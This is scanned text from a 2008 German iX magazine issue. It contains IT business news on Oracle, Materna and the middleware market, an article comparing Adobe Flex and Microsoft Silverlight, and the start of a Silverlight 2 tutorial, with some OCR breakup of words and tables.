Kauf hingeblättert haben. 


Aufkauf: Tibco beabsich- 
tigt, Insightful zu über- 
nehmen. Programme für 
statistische Datenanalyse 
und Data Mining des An- 
bieters sollen die Unter- 
nehmensanalyse-Platt- 
form Spotfire ergänzen. 


Materna wächst 
um 16 Prozent 


Der Dortmunder ITK-Dienst- 
leister Materna hat im Ge- 
schäftsjahr 2007 einen Grup- 
penumsatz von 175 Mio. € 
erwirtschaftet und damit eine 
Steigerung von 16,6 % gegen- 
über dem Vorjahr (150 Mio. €) 
erreicht. Ein Gutteil des Wachs- 
tums stammt aus dem Aus- 
landsgeschäft, dessen Anteil an 
den Einnahmen von 13 % auf 
17 % gesteigert werden konnte. 
Materna beschäftigt europaweit 
rund 1300 Mitarbeiter. Seit Jah- 
resbeginn kamen 30 neue hin- 
zu; zurzeit sucht man weitere 
170 Mitarbeiter. 
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Oracle mit sehr gutem Jahresergebnis 


Die aggressive Akquisitions- 
politik von Oracle zahlt sich 
aus. Der US-Hersteller legte 
im vierten Finanzquartal 2008, 
das zum 31. Mai endete, einen 
Umsatzsprung um 24 % auf 
7,2 Mrd. $ hin. Der Reinge- 
winn stieg um 27 % auf 2,0 
Mrd. $. Selbst wenn die Aus- 
wirkungen der Übernahmen 
herausgerechnet werden, konn- 
te Oracle im Schlussquartal mit 
besseren Bilanzzahlen glänzen 
als die Analysten erwarteten. 
Selbst währungsbereinigt sind 
die Steigerungen noch beein- 
druckend. 

Für das gesamte Geschäfts- 
jahr 2008 lag der Umsatz bei 
22,4 Mrd. $ (+25 %). Damit 
gelang es Oracle erstmalig, die 


Bereich Umsatz 

2008* 
Softwarelizenzen 7,515 
Updates & Support 10,328 
Software-Umsatz gesamt 17,843 
Services 4,587 
Gesamtumsatz 22,430 
Nettogewinn 5,521 


Softwaresparte von IBM zu 
überflügeln. Der Reingewinn 
stieg um 29 % auf 5,5 Mrd. $. 
Insgesamt legten die Erlöse 
aus den Softwarelizenzen im 
vergangenen Geschäftsjahr um 
28 % auf 7,5 Mrd. $ zu. Die 
Einnahmen aus Neulizenzen 
für Datenbanken und Middle- 
ware sollen sich dabei um 
24 %, die Einnahmen aus Neu- 
lizenzen für Applikationen um 
38 % erhöht haben. Die Um- 
sätze aus Lizenz-Updates so- 
wie Produktwartung stiegen 
um 24 % auf 10,3 Mrd. $. Die 
Services-Einnahmen steuerten 
4,6 Mrd. $ (+21 %) bei. 

Bei der Vorstellung der Er- 
gebnisse des Geschäftsjahres 
2008 traten die Oracle-Verant- 


Anteil am Umsatz Anteil am 
Umsatz 2007* Umsatz 
34 5,882 88 
46 8,329 46 
80 14,211 79 
20 3,785 2 
100 17,9% 100 
25 4,274 24 


Lukrative Geschäfte mit Middleware 


Der Umsatz mit Applikations- 
infrastruktur- und Middleware- 
Software — kurz AIM-Soft- 
ware - legte 2007 weltweit 
um fast 13 % auf 14,1 Mrd. $ 
zu. Das Wachstum basiert laut 
einer Gartner-Untersuchung 
vornehmlich auf der steigen- 
den Nachfrage in den noch 
jungen Middleware-Bereichen 
ESB (Enterprise Service Bus) 
und BPMS (Business Process 
Management Suites) sowie 
der boomenden Nachfrage in 
den Schwellenländern. 

Im vergangenen Jahr mach- 
ten die führenden fünf Anbie- 
ter mehr als die Hälfte der 


Unternehmen Umsatz 2007 
IBM 4,090 
Bea Systems 1,324 
Oracle 1,203 
Sterling 0,443 
Microsoft 0,426 
andere 6,677 
gesamt 14,163 


Einnahmen im Gesamtmarkt 
unter sich aus. Durch Über- 
nahmen und Ausbau ihres 
Produktangebots nehmen sie 
nach Ansicht der Gartner- 
Analysten den kleineren Her- 
stellern peu ä peu weitere 
Marktanteile weg. 

Nach wie vor die unbestrit- 
tene Nummer 1 ist IBM. Dar- 
an wird auch die Übernahme 
von Bea (Nummer 2) durch 
Oracle (Nummer 3) nichts än- 
dern. Dies gilt im Übrigen 
auch mit Blick auf die Region 
EMEA (Europa, Nahost und 
Afrika). Hier führt IBM eben- 
falls das 2007er-Ranking mit 


Marktanteil Umsatz 2006 

28,9 3,555 

9 1,225 

8,5 1,005 

3,1 0,437 

3,0 0,301 

472 6,022 
100,0 12,543 


wortlichen für das neue Jahr 
allerdings ein wenig auf die Eu- 
phoriebremse. Der Umsatz für 
das erste Quartal soll sich zwi- 
schen 5,42 und 5,51 Mrd. $ ein- 
pendeln, was auf einen Zuwachs 
zwischen 18 % und 20 % und 
damit die schwächste Wachs- 
tumsrate seit 2006 hindeutet. 
Ob die nahezu zeitgleich ange- 
kündigte massive Erhöhung der 
Lizenzpreise um bis zu 20 % in 
den USA diese Schwächephase 
beim Wachstum ausgleichen 
soll, lässt sich nicht abschlie- 
Bend bewerten. Denn sie kann 
ebenso dem schwachen $-Kurs 
geschuldet sein, der manches 
europäische Unternehmen zum 
günstigeren Lizenzeinkauf via 
USA verleitet. 


Wachstum Wachstum 
bereinigt 

28 2 

24 18 

26 19 

2 15 

25 19 

29 18 


einem Marktanteil von 31 % 
an, gefolgt von Oracle mit 
8,8% und Bea mit 8,5 %. Neue 
Nummer 4 ist die Software AG. 
Das Darmstädter Softwarehaus 
konnte durch den Aufkauf von 
Webmethods seinen Markt- 
anteil auf knapp 4 % verdop- 
peln und Tibco (3,7 %) hinter 
sich lassen. 

Im Unterschied zu der 
weltweiten Entwicklung sind 
die starken Wachstumsjahre 
in EMEA jedoch vorbei. 2007 
wuchsen die Umsätze mit 
AIM-Software in der Region 
nur noch um 5,9 % auf 3,4 
Mrd. €. 


Marktanteil Wachstum 

28,3 57] 

98 8,1 

8,0 19,7 

3,5 1,4 

2,4 41,6 

48,0 10,9 
100,0 129 
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Rich Clients 


Flex vs. Silverlight: 
Unterschiede und Gemeinsamkeiten 


Im Wettstreit 


Kai König, John-Daniel Trask 


Dass Adobes Flash auf dem Gebiet der Rich Internet 
Applications gewichtige Konkurrenz bekommt, war 

bereits klar, als Microsoft vor rund einem Jahr Silverlight 1 
vorstellte. Jetzt gibt es die Version 2, die technisch deutlich 


aufholen soll. 


dobe und Microsoft besetzen ein- 
A: mit Flash, Flex und AIR 

(Adobe Integrated Runtime) so- 
wie andererseits mit WPF (Windows 
Presentation Foundation) und Silverlight 
die Pole Position der Rich Internet Ap- 
plications (RIA). Der Begriff - im Jahr 
2002 von Macromedia im Zusammen- 
hang mit Flash MX und Applikationen 
für Flash Remoting geprägt — und sein 
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dreibuchstabiges Akronym werden ge- 
genwärtig an vielen Stellen und seitens 
verschiedener Hersteller hochgejubelt. 
Schaut man sich die Installationsba- 
sis des Flash-Player-Plug-in an und 
ruft sich ins Bewusstsein, mit welcher 
Marktmacht Microsoft Techniken zum 
De-facto-Standard befördern kann, so 
ist zu vermuten, dass sich das Duell 
um die RIA-Technik der Zukunft zu 


einem guten Teil zwischen Microsoft 
und Adobe abspielen wird. 

Dieser Artikel stellt beide RIA-Mo- 
delle vor, versucht sich aber bewusst 
nicht an einem Vergleichstest. Viel- 
mehr soll er zeigen, welches die Kern- 
elemente beider Ansätze sind und wie 
sich diese in der jeweils anderen Platt- 
form widerspiegeln. 


RIAs in beliebigen 
‚Net-Sprachen 


Silverlight ist Microsofts aktuelle Ent- 
wicklungsplattform für Rich-Internet- 
Applikationen, die der Hersteller mit 
dem Ziel ins Rennen geschickt hat, sich 
als Alternative zu Flash, Flex und an- 
deren RIA-Frameworks zu etablieren. 

Die Auslieferung einer Silverlight- 
Anwendung erfolgt über den Web- 
browser, für die Darstellung steht für 
verschiedene Plattformen ein Brow- 
ser-Plug-in zur Verfügung. Microsofts 
Ansatz ähnelt damit stark dem Modell, 
das der Mitbewerber Adobe nutzt, um 
Flash- oder Flex-Applikationen auf der 
Client-Seite auszuführen. 

Die Version 1.0 von Silverlight wur- 
de am fünften September 2007 veröf- 
fentlicht [1]. Sie stellte ein einfaches 
Präsentations-Framework bereit, das mit 
XAML (Extensible Application Markup 
Language) arbeitet, einer XML-basier- 
ten Markup-Sprache, die Microsoft für 
das Windows Presentation Framework 
entwickelt hat. 

Mit dieser ersten Release konnten 
Entwickler einfache Animationen mit 
Shapes und Text erzeugen, videobasier- 
te Inhalte einbinden und mit dem DOM 
(Document Object Model) der die 
Anwendung umgebenden Seite intera- 
gieren. Eine weitergehende Applika- 
tionsentwicklung war nicht unmöglich, 
jedoch technisch herausfordernd. 

Das soll die zurzeit als Beta verfüg- 
bare Version 2.0 von Silverlight ändern 
(s. „Es werde Licht‘ auf Seite 48 ): Eines 
der wichtigsten Features ist die Integra- 
tion des ‚Net Framework in Silverlight. 
Dieser Schritt war technisch notwendig, 
kam aber selbst für eingefleischte Ken- 
ner von Microsoft ein wenig überra- 
schend. Silverlight 2.0 basiert nun auf 
einer kompletten Implementierung der 
Common Language Runtime (CLR), 
die die Funktionen des .Net Framework 
in der Version 3.5 abdeckt. Für Entwick- 
ler bedeutet dies, dass sie prinzipiell jede 
‚Net-Sprache wie C#, VB.Net et cetera 
zur Anwendungsentwicklung mit Silver- 
light 2 nutzen können. 
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Durch diese Öffnung der Plattform 
dürfte Silverlight 2 bald über eine ge- 
nügend große Entwicklergemeinde 
verfügen. Das zum Betreiben der An- 
wendungen nötige Plug-in existiert 
für Windows und Mac OS X. Für an- 
dere Plattformen ist zurzeit keine offi- 
zielle Unterstützung verfügbar, für Li- 
nux ist jedoch mit Moonlight eine 
Open-Source-Implementierung auf dem 
Weg. 

Zur Zielgruppe von Silverlight zäh- 
len nicht nur Entwickler, sondern auch 


Designer, die ein flexibles Canvas 
wünschen, in dem sie RIAs entwerfen 
können. Diesen Trend zu reichhaltigen 
Benutzerschnittstellen und ausgefeil- 
tem interaktiven Design beobachtet man 
nicht nur im Umfeld der Rich Internet 
Applications, sondern in der Software- 
entwicklung generell. Es reicht heutzu- 
tage nicht mehr, Marktführer nur auf 
einer technischen Grundlage zu sein, 
Organisationen müssen ebenfalls auf 
die oben genannten eher weichen Wer- 
te im Rahmen der Anwendungsent- 


Oberfläche zur Verfügung. 


A-TRACT 


e Mit Flash, Flex und AIR auf der einen Seite und WPF, Silverlight und Expression 
Blend auf der anderen bieten Adobe und Microsoft Entwicklern Plattformen mit 
zugehörigen Entwicklungswerkzeugen für Rich Internet Applications. 


@ In beiden Fällen dient ein Browser-Plug-in der Darstellung der Inhalte, und 
beide Plattformen stellen deklarative Markup-Sprachen für die Beschreibung der 


© Silverlight-Anwender können sowohl Client- als auch Serveranwendungen in 
der .Net-Sprache ihrer Wahl entwickeln, Flash-Entwickler hingegen können MXML- 
und Actionscript-Programme nur für den Client erstellen. 


wicklung achten - ein Bereich, in dem 
Microsoft bislang kaum vertreten war, 
Adobe dafür mit seinen Kreativwerk- 
zeugen umso stärker. 


Filmmetaphern 
oder Actionscript 


Bei einem Blick auf Adobes Flash- 
Plattform stellt sich zunächst die Frage, 
welche der verschiedenen Techniken 
Silverlight am nächsten kommt. Im 
Kern ist das Adobes RIA-Laufzeitum- 
gebung, der Flash Player. 

Allerdings ist dies keine hundertpro- 
zentige Entsprechung, denn Silverlight 
kommt mit eigenem SDK und der Inte- 
gration in die CLR und die .Net-Welt, 
sodass zumindest Teile der Flash-Auto- 
renumgebung sowie die UI-Klassenbi- 
bliothek von Flex für eine halbwegs 
korrekte Abbildung in Betracht gezo- 
gen werden müssen. Der oftmals ge- 
troffene Vergleich von Silverlight mit 
AIR, Adobes Desktop-Laufzeitumge- 
bung für RIAs, ist übrigens falsch, da 
die technischen Ansätze sich signifi- 
kant unterscheiden. 


iX 8/2008 


43 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


Rich Clients 


Wie Silverlight- werden Flash- und 
Flex-Applikationen in einem Browser- 
Plug-in betrieben. Der aktuelle Flash 
Player liegt in Version 9 vor, auf Ado- 
be Labs können interessierte Nutzer 
und Entwickler bereits eine Preview 
der Version 10 herunterladen. 

Es war seinerzeit Macromedia, das 
mit Flash MX und der Unterstützung 
von RPC-Aufrufen aus Flash heraus zu 
Backend-Applikationen das RIA-Kon- 
zept prägte. Damals handelte es sich 
bei der Laufzeitumgebung um den 
Flash Player 6, und sowohl Macromedia 
als auch Adobe haben in der Zwischen- 
zeit an ihrer Plattform geschraubt. 

Adobe bietet zwei grundsätzlich 
verschiedene Arten, RIAs für den 
Flash Player zu erzeugen. Die erste 
nutzt die Flash-Autorenumgebung und 
die mit dieser verbundenen Metaphern 
wie Movieclips, Timeline, Frames et 
cetera. Die andere basiert auf Flex 
und bietet neben dem aus Flash be- 
kannten Actionscript eine XML-ba- 
sierte Markup-Sprache (MXML;) zur 
Deklaration von Benutzerschnittstel- 
len in Flex. 

An dieser Stelle besteht ein grundle- 
gender Unterschied zum Silverlight- 
Modell. SL-Entwickler können sowohl 
den Client als auch Serveranwendun- 
gen auf Basis von Microsofts CLR in 
der .Net-Sprache ihrer Wahl entwi- 
ckeln. Die Flash-Plattform trennt strikt 
zwischen Client und Server — Adobes 
Verantwortung reicht prinzipiell mit 
MXML und Actionscript nur bis zum 
Übergabepunkt der Applikationsdaten 
zwischen Client und Server. 


7 Oögects and Vimaiine 


window 


Silverlights Browser-Plug-in ist zur- 
zeit 4,6 MByte groß und für automati- 
sche Updates konfiguriert. Benutzer 
können auf dem Client des Weiteren 
einstellen, wie viel lokalen Speicher Sil- 
verlight-Anwendungen auf dem Client 
nutzen können. Die Standardeinstellung 
per Domain ist 1 MByte. Das Plug-in 
steht für Mac OS X sowie Windows 
zur Verfügung. 


Plug-in ist 
immer erforderlich 


Schaut man sich die Mechanismen des 
Flash Player an, sieht man, dass das 
Silverlight-Plug-in offensichtlich vom 
Modell des Flash-Plug-in inspiriert wur- 
de. Je nach Plattform liegt die Down- 
load-Größe zwischen 1,4 und 5 MByte. 
Adobe unterstützt neben Mac OS X und 
Windows jedoch aufseiten des Plug-in 
zusätzlich Linux und Solaris mit ak- 
tuellen Versionen des Player. Die Kon- 
figurationsmöglichkeiten erstrecken sich 
außer auf Speichereinstellungen pro 
Domain auf den Zugriff auf Mikrofon 
und Webcam sowie andere Hardware- 
anpassungen. 

Zunehmender Beliebtheit erfreuen 
sich deklarative Sprachen in RIA-Frame- 
works, da sie die Ul-Entwicklung ein- 
facher gestalten. Im Falle von Silver- 
light stellt Microsoft XAML bereit, 
das erstmals im Rahmen des Windows 
Presentation Framework auftauchte. 
Der Hersteller hat die Markup-Spra- 
che für Silverlight nicht wesentlich 
verändert, was Programmierern den 


Mit der Beta von Expression Blend 2.5 können Entwickler Silverlight-2.0- 
Anwendungen erstellen - hier eine mitgelieferte Beispielanwendung (Abb. 1). 
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Umstieg vereinfacht. Einige Teile der 
Sprache wurden jedoch speziell für 
die Anforderungen der Webentwick- 
lung modifiziert. 

Adobe hat MXML erstmals mit 
Flex 1.0 im Jahr 2004 eingeführt, in 
der Flash-Autorenumgebung taucht es 
nicht auf. Das Flex-Framework nutzt 
MXML sowohl für die Deklaration 
der Bedienoberfläche als auch für 
grafische und Audio-Effekte. Seit 
Flex 1.0 haben MXML und die hinter 
der Markup-Sprache liegende Action- 
script-Bibliothek eine starke Wand- 
lung erfahren - so hat der Hersteller 
mit Flex 2.0 einige Unausgewogenhei- 
ten bereinigt und die API stabiler und 
konsistenter ausgerichtet. 


Entwicklung mit 
Tool-Unterstützung 


Bei Silverlight 1.0 handelt es sich um 
ein einfaches Präsentations-Frame- 
work, das XAML nutzt, um leichtge- 
wichtige oder reichhaltige Webinhalte 
zu veröffentlichen. Das Entwicklungs- 
modell ist simpel gehalten und als Test- 
ballon von Microsoft in der RIA-Welt 
zu sehen. Silverlight 2.0 und seine 
.Net-Integration hingegen kann man als 
deutliche Ansage an die Mitbewerber 
verstehen, dass Microsoft mit Silver- 
light in der Riege der RIA-Frameworks 
einen Platz beansprucht. 

Die Entwicklung von Silverlight- 
Anwendungen für Version 1.0 kann 
komplett mit Microsofts Expression 
Blend erfolgen, einer Anwendung, die 
sich an den Entwicklungs- und De- 
sign-Ansätzen von Adobes Flash-Au- 
torenumgebung orientiert. Expression 
Blend unterstützt sowohl die WPF- als 
auch die Silverlight-Entwicklung. Der 
aktuelle Versionsstand ist 2.5 (Preview), 
und Microsoft versieht Expression 
Blend regelmäßig mit Updates, um die 
Kompatibilität zu den Beta-Releases 
von Silverlight 2 beizubehalten. 

Ein gängiges Szenario für den Ent- 
wicklungsprozess mit Silverlight ist die 
kombinierte Nutzung von Visual Stu- 
dio 2008 und Expression Blend. Da 
Silverlight 2 auf .Net basiert und somit 
die Nutzung von .Net-Sprachen ermög- 
licht, nutzen Entwickler oftmals Ex- 
pression Blend für die Erstellung der 
UI und anderer visueller Elemente der 
Anwendung sowie VS 2008 für code- 
zentriertes Arbeiten. Glücklicherweise 
hat Microsoft in Expression Blend das 
Projektformat von Visual Studio imple- 
mentiert, sodass ein produktübergrei- 
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fendes Arbeiten verhältnismäßig ein- 
fach ist. 

Obwohl Silverlight die CLR von 
‚Net 3.5 beinhaltet, ist die Base Class 
Library (BCL) der Standard-Version 
des .Net Framework nicht komplett 
enthalten. Der Grund für diese Restrik- 
tion ist, dass das Plug-in kompakt blei- 
ben und die Silverlight-BCL nur solche 
Klassen enthalten soll, die im Kontext 
der Browser-Sandbox sinnvoll sind. 
Die in der Silverlight-2.0-BCL enthal- 
tenen Funktionen beschränken sich da- 
her auf die Unterstützung für LINQ 
(XML, JSON, Objekte), Webservices 
(XML, REST, WCF und ADO.Net Da- 
ta Services), Sockets, Collections, Re- 
flection, reguläre Ausdrücke und Data 
Access. 

Ebenfalls Teil von Silverlight 2.0 
ist Microsofts neue Dynamic Language 
Runtime (DLR) für die Ausführung dy- 
namischer Sprachen wie IronPython 
und IronRuby in Silverlight. 

In Adobes RIA-Welt findet man zur- 
zeit hauptsächlich zwei genutzte Ver- 
sionen des Flex-Framework: 2.01 und 
3.0. Flex 2.01 ist die erste Release mit 
kostenlos erhältlichem SDK (bestehend 


aus Kommandozeilen-Tools wie De- 
bugger und Compiler sowie der Flex- 
Klassenbibliothek). Mit Flex 3.0 hat 
Adobe das SDK sowie die Klassen- 
bibliothek unter eine Open-Source-Li- 
zenz gestellt und neben Bugfixes einige 
neue Features wie die bessere Unter- 
stützung für die Internationalisierung 
oder auf dem Client gespeicherte Bi- 
bliotheken implementiert. 

Die Werkzeug-Unterstützung ist in 
der Flash-Plattform ebenfalls zweige- 
teilt. Flash-basierte RIAs werden in der 
Regel zu SWF-Dateien kompiliert und 
in einer HTML-Struktur verankert. 

Flash-Entwickler lassen sich grob 
in zwei Gruppen einteilen. Diejenigen, 
die via Flash-Animation und -Design 
zur RIA-Entwicklung gekommen sind, 
greifen typischerweise auf die Flash- 
Autorenumgebung und andere CS3- 
Werkzeuge zurück, um das Design zu 
erstellen; für die Codebasis nutzen sie 
dann Actionscript in Flash oder ein ex- 
ternes Werkzeug wie FDT (Flash Devel- 
opment Tool der Firma Powerflasher). 

Entwickler, die hingegen den Zugang 
zur Flash-Plattform mit einem Hinter- 
grund in klassischer Softwareentwick- 


lung finden, tendieren meist zu einem 
anderem Workflow, der auf dem Flex- 
Framework und Adobes Entwickler- 
IDE Flex Builder basiert. Sie nutzen, 
analog zu Silverlight, MXML und Ac- 
tionscript zur Entwicklung. Trotz allem 
spielt die Flash-Autorenumgebung in 
diesem Workflow eine wichtige Rolle, 
denn sie dient oftmals als Werkzeug zur 
Individualisierung von Ul-Komponen- 
ten mithilfe von Styles und Skins, die 
aus der Flash-Autorenumgebung heraus 
als SWF-Datei exportiert werden. 

Die Flash-Plattform bietet kein ein- 
heitliches Entwicklungsmodell, das über 
Client und Server hinweg funktioniert, 
was vor allem die .‚Net-Community 
häufg als Nachteil empfindet. Adobe hat 
diesen Weg gewählt, um eine Vielfalt 
von Backend-Techniken an die Flash- 
Plattform anbinden zu können, und so 
existiert neben XML-Webservices und 
HTTP-Aufrufen ein Remoting-Verfah- 
ren, das man über sogenannte Remote- 
Object-Klassen in Flex nutzen kann. 
Mithilfe eines serverbasierten Remoting 
Gateway lassen sich problemlos Platt- 
formen wie Java, .Net, PHP und viele 
andere an Flex und Flash andocken. 
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Rich Clients 


Silverlight-Applikationen werden in 
einem einfachen Deployment-Prozess 
für Nutzer bereitgestellt. Prinzipiell 
muss der Entwickler nur einige wenige 
Schritte durchführen. Der Kernpunkt 
dabei ist, dass er auf Seiten des HTTP- 
Servers einen neuen MIME-Type ein- 
richtet, sodass XAML-Dateien korrekt 
ausgeliefert werden können. Das De- 
ployment an sich kann mithilfe von IS 
oder Apache erfolgen (seit Silverlight 
2.0), und die Silverlight-Anwendung 
als solche wird dann in der Plug-in- 
Sandbox auf dem Client des Nutzers 
ausgeführt. 


Installation und Verteilung 


Microsoft bietet zudem einen Hosting- 
Dienst namens Silverlight Streaming 
Services (SSS), der maximal 10 GByte 
kostenlosen Hosting-Speicher für Silver- 
light-Applikationen oder -Videoinhalte 
zur Verfügung stellt. Der Entwickler 
kann Videos direkt aus dem Expression 
Media Encoder heraus in SSS veröffent- 
lichen und in einem Videoplayer seiner 
Wahl einbetten. Für Anwendungen steht 
eine Administrationskonsole bereit, in 
die sich Entwickler über einen Win- 
dows-Live-Account einloggen können. 

Die Verteilung einer SWF-Applika- 
tion der Flash-Plattform ist denkbar ein- 
fach. Da im Regelfall die Quellen (eine 
oder mehrere FLA-Dateien oder AS/ 
MXML-Quellcodedateien) zu einer 
oder mehreren SWF-Dateien kompiliert 
werden, reicht es, diese inklusive ihrer 
HTML-Wrapper auf einem beliebigen 
Weberver bereitzustellen. Die Plattform 
ist ebenfalls nicht von Bedeutung, so- 


dass es keine Schwierigkeit bereitet, 
Flash-Anwendungen auf exotischen 
Hosting-Umgebungen anzubieten. 

Will man eine Servertechnik über 
RemoteObject-Klassen nutzen, muss 
die SWF-Applikation wissen, über 
welches Remoting-Gateway sie diese 
ansprechen kann. Das kann und wird 
oftmals auf derselben oder einer be- 
nachbarten Hosting-Maschine der Fall 
sein, kann aber prinzipiell und unter 
Beachtung verschiedener Sicherheits- 
parameter auch eine entfernte Remo- 
ting-Gateway-Umgebung sein. 

Eine der Neuerungen in Flex 3 ist 
die Unterstützung für das lokale Ca- 
ching und Speichern des Flex-3-Frame- 
work auf Clientseite. Bislang wurden 
die Core-Klassen immer in die erzeugte 
SWF-Datei einkompiliert, sodass Nutzer 
von Flex-basierten Flash-Anwendun- 
gen sie unnötigerweise wiederholt la- 
den mussten. Der neue Mechanismus 
lädt diese Framework-Klassen gegebe- 
nenfalls von einem Adobe-Server nach, 
sollten sie weder auf dem Client vor- 
handen sein noch im Kompilat der Ap- 
plikation zur Verfügung stehen. 


Fazit 


Vergleicht man die Klassen- und Kom- 
ponentenbibliotheken von Flash und Sil- 
verlight, schneiden Erstere zurzeit bes- 
ser ab. Speziell die Ul-Komponenten 
von Flex 3 sind ausgereift und vielfälti- 
ger als Silverlights Oberflächen-Kom- 
ponenten. An dieser Stelle muss man 
allerdings in Betracht ziehen, dass im 
.‚Net-Umfeld ein großer Markt an Drit- 
tanbietern für Ul-Komponenten und an- 
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Flex Builder 3 bietet einen Designmodus zur Anordnung der Ul-Elemente in 


einer Applikation (Abb. 2). 
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dere Tools existiert. Einige dieser Fir- 
men sind bereits auf den Silverlight-Zug 
aufgesprungen und haben Komponenten 
im Programm, die Silverlight auf ein 
vergleichbares Level mit Flex 3 heben. 

Beide Firmen rüsten sich für ein Ren- 
nen um die RIA-Krone. Die Entwick- 
lergemeinde aufseiten Silverlights ist 
verglichen mit Adobes Community von 
Flash-Plattform-Entwicklern noch klein. 
Gleiches gilt für die Verbreitung des 
Silverlight-Plug-ins verglichen mit dem 
Flash Player. Wie die Erfahrung jedoch 
zeigt, ist es für Microsoft relativ einfach, 
Techniken und Plattformen den richti- 
gen Anstoß zu geben, sich auf breiter 
Basis durchzusetzen — gerade wenn man 
die große existierende .Net-Installations- 
plattform in Betracht zieht. 

Ein gewichtiger Vorteil für die Flash- 
Plattform sind die vielen Nutzer der 
Flash-Autorenumgebung, von denen 
sich langfristig ein großer Teil zumindest 
am Rande mit Flex beschäftigen wird. 
Ebenfalls nicht außer Acht lassen darf 
man die Gruppe der von JavaFX ent- 
täuschten Java-Entwickler auf der Suche 
nach einer alternativen RIA-Technik. 

Letztendlich ist es unmöglich, eine 
Empfehlung auszusprechen. Wie so oft, 
kann der Rat nur lauten, sich im Einzel- 
fall Projektanforderungen und andere 
Rahmenparameter anzusehen, um die 
für den Arbeitgeber oder Kunden am 
besten geeignete Plattform auszuwählen. 
Beide haben Vor- und Nachteile, und es 
scheint zurzeit nur schwer möglich, ei- 
ne Vorhersage zu treffen, ob sich einer 
der beiden Ansätze durchsetzen oder ob 
eventuell ein Nebeneinander zumindest 
die nähere Zukunft prägen wird. (ka) 
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Webprogrammierung 


Silverlight-2-Tutorial, Teil I: Erste Schritte 


Es werde L 


Regina Dowling, Jörg Müller 
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Microsofts Flash-Konkurrent Silverlight hat Ambitionen: 

Die aktuelle Version 2 bietet etliche Neuerungen zur Entwicklung 
von Rich Internet Applications. Vor allem .Net-Entwickler können 
leichten Zugang zu diesen Möglichkeiten finden. Ein dreiteiliges 


Tutorial soll den Weg ebnen. 


as sich mit Silverlight 1.1 be- 
reits andeutete, bestätigt die 
Silverlight 2 genannte Ver- 


sion (die aktuell als Beta 2 vorliegt): 
Microsoft liefert eine Version des .Net 
Framework für Windows- und Mac- 
intosh-Plattformen, mit der sich auf 
XAMIL-Basis (Extensible Application 
Markup Language) Webanwendungen 
entwickeln lassen, die zwar von einem 
Browser über ein Plug-in aufgerufen 
werden, dabei aber aussehen können 
wie Desktop-Applikationen. 

Der Silverlight-Client benötigt da- 
bei kein vorinstalliertes ‚Net Frame- 
work auf dem Zielrechner: Der einma- 
lige Download des Installers enthält 
alles Notwendige, um Silverlight-An- 
wendungen auf einem Mac-OS-X- 
oder Windows-Rechner zu ermög- 
lichen — und das alles in weniger als 
5 MByte unter Windows. 7,7 MByte 
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sind es unter Mac OS, Moonlight - 
Silverlight für Linux - ist im Rahmen 
des Mono-Projekts noch in Arbeit. So- 
bald das Plug-in installiert ist, Können 
viele gängige Browser (darunter IE, 
Firefox, Safari) Silverlight-Inhalte an- 
zeigen. 

Getreu den Ansprüchen umfangrei- 
cher Softwareprojekte sind in Silver- 
light-Applikationen Oberfläche, An- 
wendungslogik und Daten voneinander 
getrennt: Dies spiegelt die Gegebenhei- 
ten in den meisten Teams wieder, er- 
leichtert die Verteilung der Aufgaben 
an Entwickler und Designer und ermög- 
licht paralleles Arbeiten — das bringt 
Effizienz und reduziert den Aufwand, 
wenn Anpassungen notwendig sind. 
Wie bei den bisherigen Versionen sind 
die entsprechenden Tools (Visual Stu- 
dio 2008 und Expression Studio 2.5) 
eng integriert. 


Dieses Tutorial wendet sich vor allem 
an .Net-Entwickler, die den Einstieg in 
die Erstellung von „reichen“ Weban- 
wendungen suchen und denen Silver- 
light eine Alternative zu etablierten Lö- 
sungen wie dem Gespann HTML/Ajax 
oder Adobes Flash-Plattform bietet. Die- 
ser erste Teil beginnt mit einem Über- 
blick über den aktuellen Funktionsum- 
fang, ein paar Installationstipps und 
einem einfachen Beispielprojekt. Um 
den gegebenen Rahmen nicht zu spren- 
gen, beschränken sich die Code-Beispie- 
le auf den Einsatz von C#, der Standard- 
‚Net-Sprache, sie lassen sich aber leicht 
auf andere portieren. 


Silverlight 2: 
Kompakt und komplex 


Der „Schüler“ Silverlight hat vor allem 
ein umfangreiches Sprachtraining erhal- 
ten: Anstatt ausschließlich in Javascript 
(wie bei der Version 1.0) können Ent- 
wickler nun Silverlight-Anwendungen 
in jeder beliebigen .Net-Sprache entwi- 
ckeln, zusätzlich zu Javascript sind dies 
Veteranen wie C# und VB.Net, aber 
auch die .Net-Neulinge IronPython und 
IronRuby. Kaum jemand muss also auf 
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seine gewohnte Entwicklungsumgebung 
verzichten, wenn er sich auf Silverlight 
einlassen will. 

Das Programmiermodell basiert auf 
WPF (Windows Presentation Founda- 
tion), allerdings steht nur eine Teilmen- 
ge der Funktionen in Silverlight zur 
Verfügung. Was zunächst wie ein Ver- 
lust klingt, hat gute Gründe: die platt- 
formübergreifende Unterstützung, eine 
Optimierung der Dateigröße der Run- 
time, das Weglassen von für den Web- 
client wenig relevanten Funktionen oder 
auch fehlende Hardwarebeschleunigung. 
Insgesamt ist Microsoft ein ausgewoge- 
ner Kompromiss zwischen Kompaktheit 
und Komplexität gelungen. 

In Silverlight 2 entspricht die Com- 
mon Language Runtime (CoreCLR) der 
des .Net 3.0 Framework, so dass sie alle 
gewohnten .Net-Sprachen ausführen 
kann. Auf diese Weise lässt sich die 
XAML-Datei, die das Layout der An- 
wendung definiert, durch .Net-Code um 
Funktion und Interaktivität erweitern. 
Klassen in sogenannten Code-behind- 
Dateien enthalten die Programmlogik 
und können in jeder .‚Net-Sprache ge- 
schrieben werden. Der Entwickler erhält 
nicht nur Zugriff auf die Silverlight- 
Anwendung, sondern kann auch die 
HTML-Seite manipulieren, in der das 
Silverlight-Control eingebettet ist. So- 
wohl XAML-Markup als auch .Net- 
Klassen werden in Assemblies kompi- 
liert, die gepackt und als XAP-Dateien 
(sprich: „zap‘) gespeichert werden. 


Reichlich Features 
für reiche Clients 


Die aktuelle Beta von Silverlight 2 
enthält eine Reihe von Features für die 
Entwicklung von RIAs (Rich Internet 
Applications), die sich sehen lassen 
können - hier die Highlights: 

— Dynamische Sprachen: Wie erwähnt 
unterstützt Silverlight 2 die neue Dy- 


namic Language Runtime (DLR) und 
erweitert damit den Kanon der zur 
Verfügung stehenden .Net-Sprachen um 
dynamische wie Ruby oder Python. 
Allerdings ist die DLR nicht in das Ba- 
sis-Plug-in integriert, sondern der An- 
wender muss sie als separate Erwei- 
terung (Dynamic Silverlight, DSL) 
installieren. 

